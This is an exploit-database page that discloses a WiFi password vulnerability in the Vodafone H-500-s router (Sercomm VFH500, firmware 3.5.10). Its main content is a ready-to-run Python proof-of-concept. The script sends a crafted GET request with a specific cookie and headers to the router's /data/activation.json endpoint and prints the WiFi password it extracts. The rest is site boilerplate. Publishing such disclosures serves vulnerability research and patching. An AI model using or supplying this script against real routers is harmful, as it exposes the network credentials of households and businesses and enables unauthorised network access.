Vodafone H-500-s 3.5.10 WiFi Password Disclosure

2022.01.05
Credit: Daniel Monzon
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure # Date: 01/01/2022 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.vodafone.es/ # Software Link: N/A # Version: Firmware version Vodafone-H-500-s-v3.5.10 # Hardware model: Sercomm VFH500 # The WiFi access point password gets disclosed just by performing a GET request with certain headers import requests import sys import json if len(sys.argv) != 2: print("Usage: python3 vodafone-pass-disclose.py http://IP") sys.exit() url = sys.argv[1]+"/data/activation.json" cookies = {"pageid": "129"} headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept- Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested- With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"} req=requests.get(url, headers=headers, cookies=cookies) result=json.loads(req.text)[3].get("wifi_password") print("[+] The wifi password is: "+result)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top